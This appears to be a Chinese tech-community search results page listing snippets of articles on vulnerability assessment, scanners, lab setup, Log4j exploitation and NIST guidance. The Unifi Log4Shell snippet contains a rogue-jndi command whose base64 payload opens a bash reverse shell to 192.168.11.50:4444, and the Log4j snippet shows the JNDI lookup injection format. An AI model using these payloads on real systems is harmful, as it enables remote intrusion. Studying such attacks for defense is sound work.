首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏科技云报道

    漏洞管理受重视,企业如何做好漏洞评估

    那么,针对漏洞管理,企业应当如何做好漏洞及安全风险评估工作呢? 很多企业直到成为网络攻击的受害者,方知网络安全的重要性,但已为时已晚,危害已经产生。 针对漏洞评估 企业能做什么? 对于企业而言,及时发现自身设备及网络的安全漏洞,是进行安全防护的重要前提。 以下措施或许能够帮助到进行漏洞评估的企业。 1.与利益相关者沟通 在进行漏洞评估时,很多人认为扫描过程是其中最重要的部分,但有时并非如此。 与利益相关者进行及时有效的沟通协商也是关键。 4.进行评估 针对漏洞评估,使用什么工具,如何配置它们以及如何执行评估过程因人而异。因此,根据规则来配置工具非常重要。 此外,还应当避免因主动配置扫描操作可能对系统造成的损害。 5. 重视漏洞管理,做好漏洞评估,将为企业网络安全建设带来事半功倍的效果。

    2.6K20编辑于 2022-04-16
  • 来自专栏FreeBuf

    Amazon Inspector:基于云的漏洞评估工具

    关于AWS Inspector Amazon Inspector是一种自动化安全评估服务,可根据Amazon云中的合规性评估已部署资源的安全漏洞。 AWS Inspector是一项非常重要的安全评估服务,因为它会生成自动报告,其中包含了所选资源的详细结果。它会根据漏洞的严重程度对漏洞进行优先级排序,从而使你可以轻松了解哪些软件需要立即进行修补。 而AWS inspector则是在所有EC2实例中安装一个代理,然后在内部检查所有可能的漏洞,并提供包含建议缓解措施的详细报告。。 下面给出了配置AWS Inspector所涉及的步骤摘要: 登录EC2实例 在EC2实例上配置inspector agent 通过AWS console配置评估目标 配置评估模板 配置评估规则 执行评估 在上图中我们可以看到,我们必须定义评估目标,因此我们输入了“infosec-test”作为该评估的名称。下一个框定义了评估的范围。默认情况下,添加到此帐户中整个实例都将被添加到scope中。

    2.7K30发布于 2019-08-26
  • 来自专栏FreeBuf

    2023版漏洞评估工具Top10

    前言 对于发现资产中已知漏洞、配置不当等问题的工具,大家习惯性称之为“漏洞扫描”工具,但随着技术演进,很多工具越来越智能,逐渐具备分析总结能力,因此将它们称为“漏洞评估”工具似乎更准确。 大多数漏洞评估工具都能覆盖常规漏洞,例如OWASP Top10,但一般都各有所长。常见的区分维度包括部署灵活性、扫描速度、扫描准确度以及与流程管理、代码开发等平台的整合性。 主要功能 漏洞评估; 访问公共漏洞数据库; OpenSCAP Base提供经NIST认证的命令行扫描工具,以及图形用户界面便于使用; OpenSCAP Daemon可根据SCAP标准对基础设施进行持续扫描 OpenVAS (终端和网络) 传送门 https://www.openvas.org/ Nessus是Tenable发布的一款全球领先的漏洞评估产品。 而OpenVAS是Nessus的一个开源分支,功能丰富,漏洞来源广泛,可对传统端点和网络进行大规模的漏洞评估

    2.6K20编辑于 2023-02-24
  • 来自专栏云基础安全

    Web风险评估:腾讯云Web漏洞扫描

    一、认识腾讯云Web漏洞扫描 Web 漏洞扫描是用于监测网站漏洞的安全服务,为企业提供 7*24 小时准确、全面的漏洞监测服务,并为企业提供专业的修复建议, 从而避免漏洞被黑客利用,影响网站安全。 了解腾讯云Web漏洞扫描: https://cloud.tencent.com/product/cws image.png ---- 二、Web漏洞扫描器价值 目前的大多数应用都是web应用,http web应用漏洞就是利用这个合法的通路,采用SQL注入、跨站脚本、表单破解等应用攻击方式来获取服务器的高级权限。在目前的网络环境下,威胁最大的漏洞形式就是web应用漏洞,通常是攻击者攻陷服务器的第一步。 常见的漏洞包括SQL注入、跨站脚本攻击、和编码漏洞等,表单破解主要是针对服务器用户的弱口令破解。 Web漏洞扫描以黑客视角,通过定期扫描,监测、发现Web应用漏洞,并提供修复建议,帮助加强业务系统安全性,大幅减少Web应用漏洞暴露给网站及Web业务带来的风险问题。

    7.6K00发布于 2018-09-09
  • 来自专栏信数据得永生

    Kali Linux 秘籍 第五章 漏洞评估

    第五章 漏洞评估 作者:Willie L. Nessus 允许我们攻击很多种类的漏洞,它们取决于我们的版本。我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞。 我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞。这个密集中,我们会配置 Nessus 来发现目标上的网络漏洞。这些漏洞针对主机或网络协议。 5.6 安装、配置和启动 OpenVAS OpenVAS,即开放漏洞评估系统,是一个用于评估目标漏洞的杰出框架。它是 Nessus 项目的分支。不像 Nessus,OpenVAS提供了完全免费的版本。 5.7 OpenVAS - 发现本地漏洞 OpenVAS 允许我们攻击很多种类的漏洞,它们取决于我们的版本。我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞

    1.2K10编辑于 2022-11-27
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-4

    2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中包含XSS,SQL注入,文件上传,文件包含,CSRF和暴力破解等各个难度的测试环境。 2.将DVWA重命名为dvwa并移动到htdocs Windows用户直接将文件拖到www即可(系统状态栏左下角) image.png 3.配置如上 注意:打开全局权限和用户账户数据库中的两个服务 4.

    72820编辑于 2022-03-18
  • 来自专栏耕耘实录

    几款Linux系统漏洞扫描、评估工具简介

    二、Nessus Nessus是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 Nessus会时常更新,且具有全面报告、主机扫描以及实时漏洞搜索的功能。但是,Nessus也可能会出现误报和漏报。 这是一款收费软件,对于一般用户有7天的使用时间。 官方网站为:nessus.org 三、OpenVAS OpenVAS (Open Vulnerability Assessment System,开放式漏洞评估系统)是一套可用于扫描漏洞和全面漏洞管理的工具和服务系统 OpenVAS 的核心功能是其所提供的安全扫描器,可使用超过 33,000 每日更新的网络漏洞测试(NVT, Network Vulnerability Test )。使用OpenVAS并不需要订阅。 Nikto 不仅可用于检查 CGI 漏洞,还可以躲避的方式运行,以便躲避入侵探测系统。Nikto 所提供完整的文档资料,在运行程序前,应当仔细查核。

    4.8K30发布于 2018-12-20
  • 来自专栏网络信息安全

    漏洞复现】Apache Log4j 漏洞利用分析

    Apache Log4j 漏洞利用分析 Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了 ,复现漏洞来学习一下,希望可以帮助到大家。 _221 三、 漏洞分析 测试代码如下: #log4j,java import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger log4j 中 jdni 的用法格式如下: ${jndi:JNDIContent} 既然明确了lookup是触发漏洞的点,并且找到了可以触发 lookup的方法 ,那么就可以找入口点,只要找到入口点,然后传入 ,其余的方法需要配置日志级别才可以触发漏洞

    1.3K10编辑于 2024-03-12
  • 走进“乌云”教科书书里的漏洞4)【充值舍入漏洞

    0x01 漏洞解析舍入漏洞是财务、支付、电商等涉及金额计算的系统中,因对小数金额的舍入规则设计不当或计算逻辑不统一,导致实际金额与预期金额产生偏差,进而被攻击者利用获取非法利益的业务逻辑漏洞。 其核心成因是不同系统模块(如订单计算、支付对账、退款结算)采用不一致的舍入方式,或未对舍入后的金额进行二次校验,形成金额差漏洞。 100 元订单拆分为 100 笔 1 元订单),利用每笔订单舍入产生的 0.01 元差额,通过批量操作获取非法收益;或在退款场景中,利用舍入差异使实际退款金额高于原支付金额,实现 “薅羊毛”0x02 漏洞复现本次使用靶场连接 在数据包里有提示:输入0.018,成功获取flag0x03 漏洞修复方法修复需围绕 “后端主导校验、拒绝信任前端数据” 核心原则,从数据校验、逻辑设计、监控审计三方面入手:后端强制重算金额:后端接收订单请求后

    62610编辑于 2025-08-25
  • 来自专栏绿盟科技研究通讯

    小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(附录)

    包含截至2015年1月22日的更新.网址:https://doi.org/10.6028/NIST.SP.800-53r4 [SP800-53A] 联合特遣队转型计划(2014),联邦信息系统与组织的安全和隐私控制评估 高与审计记录分析(而非VUL能力)相关CA-2 (2)安全评估|专业评估 组织的安全控制评估包括按【赋值:组织定义的频率】,【选择:通知,不通知】,【选择(一个或多个):深度监控;漏洞扫描;恶意用户测试 高与评估能力相关RA-5 (4)漏洞扫描|可泄露的信息 组织判断攻击者可发现信息系统的哪些信息,然后采取【赋值:组织定义的纠正措施】。 国家漏洞数据库(NVD) [IR7511]基于标准的美国政府漏洞管理数据库,其中的数据依照安全内容自动化协议(SCAP)进行组织,用于辅助漏洞管理自动化和安全评估,促进合规。 否则,这些遗漏的漏洞检查只有在攻击成功后进行根因分析时(假设检测到了攻击),才能被发现。 说明:这些项目不一定包含在控制项评估说明中,除非同样适用于期望和实际状态以外的其他评估项目的配置管理。

    86730发布于 2021-08-06
  • 来自专栏码上修行

    基于GIS的合肥市BRT和Metro的交通可达性研究-part4

    看完《基于GIS的合肥市BRT和Metro的交通可达性研究》part1、part2、part3……系列文章,紧接着往下看...... ---- 九、网络分析与空间分析 ——以居民点至商业金融中心的可达性求解为例 3、求解可达性 步骤和方法如下: 本操作是针对【商业金融中心_OD 成本矩阵(时间)】图层下【线】表 ① 为【商业金融中心_OD 成本矩阵(时间)】图层下【线】表添加双精度类型(Double)的【加权时间 】字段; ④根据【ObjectID】连接【起始点】表和【加权旅行时间汇总表.dbf】表,连接字段是【ODLines_OriginID】,并计算居民点可达性: 民点至商业金融中心的【可达性】= Sum_ 利用模型构建器,自动计算可达性 ? 选好变量后,直接运行即可。 4、空间插值 由于以居民区点图的方式看可达性很不直观,通过ArcGIS10.0空间分析模块中反距离插值得到整个研究区域无空白栅格图,直观地反映了居民点可达性分布情况,便于比较,分析,评价和得出结论。

    1K20发布于 2019-11-24
  • 来自专栏绿盟科技研究通讯

    小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(下)

    如3.1节所述,该资料由组织进行定制和调整,最终纳入安全评估计划。 3.2.1 基础子能力和相关缺陷检查 NISTIR 8011第4卷针对VUL能力提出了一种面向安全的基础缺陷检查。 2(a)VUL-F01低SI-2(c)VUL-F01低SI-2(d)VUL-F01中SA-11(d)VUL-F01高SI-2(1) 3.2.2 数据质量子能力和相关缺陷检查 NISTIR 8011第4卷提出了四种数据质量缺陷检查 4) 及时性太差(与定义的阈值相比较)则为缺陷。若及时性差,未发现缺陷的风险会增加。及时性较差时,未发现的缺陷的风险随之增加。 并且,自动化漏洞扫描工具还提供关于已发现的软件漏洞的风险信息和风险优先级排序信息。 [2] 虽然自动化工具可能每3-4天进行一次评估,但各组织可根据ISCM策略确定合理的评估频率。 原文链接:https://csrc.nist.gov/publications/detail/nistir/8011/vol-4/final 关于小蜜蜂翻译组公益译文项目 ?

    73730发布于 2021-08-06
  • 来自专栏绿盟科技研究通讯

    小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(上)

    概要 NISTIR8011第4卷按步骤详细描述了安全控制措施的自动化评估过程,这些评估为特定评估范围(目标网络)内的漏洞管理提供了支持,并将结果应用于该网络内所有授权范围内的评估。 NISTIR8011第4卷提供了详细的评估计划,以评估漏洞管理相关的控制措施的有效性。其中包括支撑该计划的具体测试、测试对于特定控制措施的适用性以及缓解评估中所发现缺陷所需的资源。 前言 1.1目的和范围 NISTIR8011第4卷为自动化评估与软件漏洞管理(VUL)中的信息安全持续监控(ISCM)安全能力相关的NISTSP 800-53[SP800-53]安全控制措施提供了操作方法 2.1发现缺陷/确定响应优先级 运用VUL能力,组织可发现已授权或待授权软件[4]中的漏洞。发现了漏洞,组织才能有效地管理和保护自己。 软件漏洞管理能力运营概念(CONOPS)定义了如何实现VUL能力,是自动化评估流程的核心。请参见图4。 ? 图4.

    79360发布于 2021-08-06
  • 来自专栏依乐祝

    SQL Server数据库漏洞评估了解一下

    SQL Server Management Studio 17.4或更高版本的SSMS中提供了SQL Server漏洞侦测(VA)功能,此功能允许SQL Server扫描您的数据库以查找潜在的安全漏洞, 实战演练 要运行漏洞侦测,只需选择我们需要扫描的数据库,然后右键单击并选择“任务”。在这里,您将看到漏洞评估选项接着选择扫描漏洞。 我真的很喜欢这个特性,并且它是一个方便的脚本,用于以后评估其他服务器的健康状况时使用。它甚至给了我们一个小的复制按钮,以复制出脚本和选项打开它在查询窗口。 ? 基线允许您对结果报告中的错误结果进行接收,这样在下次漏洞扫描的时候这个错误的结果就不会出现在错误列表里面了。 ? 总结 SQL Server漏洞评估评估数据隐私、安全性和遵从性标准的一个非常好的第三方工具,并且非常容易使用。纸上得来终觉浅,还不赶紧尝试一下,看看数据库存在哪些可以提升的地方吧。

    1.4K30发布于 2018-12-28
  • 来自专栏全栈程序员必看

    db4o java,db4o Java版性能测试评估

    public class Testdb4oIndex { public static class Record { String strKey; long intKey; }; public 100000; static public void main(String[] args) { new File(FILE).delete(); Configuration conf = Db4o.configure Integer.MAX_VALUE); conf.automaticShutDown(false); conf.lockDatabaseFile(false); ObjectContainer db = Db4o.openFile

    46310编辑于 2022-09-13
  • 来自专栏程序员升级之路

    Apache Log4j漏洞修复

    一、如何确定是否中招或已经修复 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; "+cmdMessage ); logger.error("log4j2testerror"+cmdMessage ); logger.warn("log4j2testwarn <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl</artifactId> </exclusion> </exclusions> </dependency> 项目中用的比较多的是下面几个包: log4j-api log4j-core log4j-jul log4j-slf4j-impl > <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl<

    1.7K20编辑于 2021-12-13
  • 来自专栏R0A1NG 技术分享

    Log4j2漏洞复现

    原理 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限 靶机:http://192.168.223.129:8080/ 靶机搭建: 1.平台环境 http://vulfocus.fofa.so/ 2.本地搭建 docker pull vulfocus/log4j2 -rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest 复现过程 先用dnslog 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"; 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true" 4. 关闭应用的网络外连。

    2.3K30编辑于 2022-02-19
  • 来自专栏FreeBuf

    企业漏洞管理的4大误区

    但是,企业可以采取很多措施来降低风险,特别是在漏洞管理方面。 漏洞管理的重要性通常被低估或忽视。我们来看看有哪些常见的漏洞管理认知误区并且来揭穿它们。 幸运的是,新的漏洞管理解决方案可以在不影响网络性能的情况下更快,使大规模扫描变得更快、更容易,因此,企业没有充分的理由偷懒。 误区2:漏洞=修补 许多人将漏洞等同于修补。 仅仅思考补丁是短视的,全面了解漏洞管理才能为组织提供更好的安全服务。 误区三:修复严重漏洞就能确保安全 组织必须首先解决5级严重漏洞的这一观点已经过时。 要么需要采用新的考虑因素和排名系统来解决漏洞,要么应该选择双管齐下的策略,利用自动化的漏洞管理解决方案立即修复较低级别的漏洞,同时释放团队成员来同时修复较高级别的漏洞。 误解四:漏洞管理没什么大不了的 这一观点显然缺乏对漏洞管理的重视。

    1.3K20发布于 2020-04-14
  • 对抗样本防御研究中的评估缺陷与代码漏洞分析

    该论文包含数学上不可能的声明,未遵循对抗鲁棒性评估的推荐指南,且其自身图表就提供了评估方法错误的所有必要证据。调查发现,该论文的评估代码存在漏洞。仅修改一行代码即可攻破防御,将模型准确率降为0%。 在将漏洞告知作者后,作者提出了新的防御组件来防止此攻击。但这个未在原始论文中描述的新组件存在第二个漏洞。同样,通过修改一行代码,可以攻破这个修改后的防御。作者表示正在为第二次攻击制定另一个修复方案。 针对特定防御论文的故事:论文被顶级会议接受后,作者在被告知漏洞后修改防御机制,但修改后的版本仍存在漏洞,且无法提供修复细节。这两个问题并非该论文独有。 故事二:存在漏洞的论文回到今年发表的防御论文,这是一个九头蛇般的论文故事:每次攻破当前描述的防御,它就会长出一个需要评估的新防御组件。攻破防御当防御评估存在严重缺陷时,通常很容易攻破。 在评估防御方面,撰写了一篇又一篇关于如何执行此类评估的论文。甚至写了一篇主要目标是帮助评审者知道防御评估何时足够好的论文。

    31410编辑于 2025-08-26
  • 来自专栏Khan安全团队

    Unifi Log4jshell漏洞利用

    介绍 到现在为止,您可能已经很清楚最近披露的 Java 日志库 Log4j 的一个漏洞。该漏洞影响广泛,影响开源项目和企业软件。 Ubiquiti 在漏洞发布后不久宣布,他们的一些产品受到影响。 Sprocket 使用 Twitter 发布了使用 Log4j 在易受攻击的 Unifi 网络应用程序安装上实现远程代码执行的概念证明。 一旦您确定了一个易受攻击的实例,就可以轻松地进行漏洞利用。 中构建您的命令: java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC4xMS41MC80NDQ0IDA 据我所知,这个 Log4j 漏洞有可能产生重大影响。为什么?

    3.4K10编辑于 2022-01-05
领券